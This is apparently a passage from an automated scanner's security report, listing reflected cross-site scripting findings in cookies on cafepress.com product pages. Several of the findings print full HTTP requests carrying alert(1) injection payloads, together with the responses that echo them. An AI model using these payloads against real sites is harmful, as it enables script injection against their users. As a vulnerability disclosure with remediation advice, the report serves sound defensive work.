GET /+framed-prints HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAd4dfd"-alert(1)-"012c3a7120a ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 63755 Date: Sun, 26 Dec 2010 13:48:46 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:46 GMT; path=/ Set-Cookie: cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:46 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 63755 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAd4dfd"-alert(1)-"012c3a7120a "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.33. http://www.cafepress.com/+framed-prints [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+framed-prints
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93d2c</script><script>alert(1)</script>063b6447c14 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+framed-prints HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=93d2c</script><script>alert(1)</script>063b6447c14 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 63777 Date: Sun, 26 Dec 2010 13:48:45 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:44 GMT; path=/ Set-Cookie: cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:44 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 63777 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '93d2c</script><script>alert(1)</script>063b6447c14 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.34. http://www.cafepress.com/+greeting_cards [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+greeting_cards
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61088"-alert(1)-"7f0a7ca94f0 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+greeting_cards HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA61088"-alert(1)-"7f0a7ca94f0 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 59694 Date: Sun, 26 Dec 2010 13:49:18 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:18 GMT; path=/ Set-Cookie: cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:18 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59694 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA61088"-alert(1)-"7f0a7ca94f0 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.35. http://www.cafepress.com/+greeting_cards [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+greeting_cards
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53143</script><script>alert(1)</script>28c54f936c4 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+greeting_cards HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=53143</script><script>alert(1)</script>28c54f936c4 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 59716 Date: Sun, 26 Dec 2010 13:49:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/ Set-Cookie: cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59716 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '53143</script><script>alert(1)</script>28c54f936c4 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.36. http://www.cafepress.com/+hats-caps [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+hats-caps
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a79d4"-alert(1)-"d4edfd82353 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+hats-caps HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAa79d4"-alert(1)-"d4edfd82353 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59421 Date: Sun, 26 Dec 2010 13:47:16 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/ Set-Cookie: cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59421 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAa79d4"-alert(1)-"d4edfd82353 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.37. http://www.cafepress.com/+hats-caps [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+hats-caps
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64dd9</script><script>alert(1)</script>4516792b671 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+hats-caps HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=64dd9</script><script>alert(1)</script>4516792b671 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
